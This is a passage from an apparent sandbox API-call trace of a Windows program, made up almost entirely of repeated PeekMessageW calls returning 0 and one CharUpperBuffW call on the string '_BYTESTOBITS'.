wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.498] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.499] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0072.500] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.500] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.501] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.502] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.503] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 [0072.505] PeekMessageW (in: lpMsg=0x61f354, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f354) returned 0 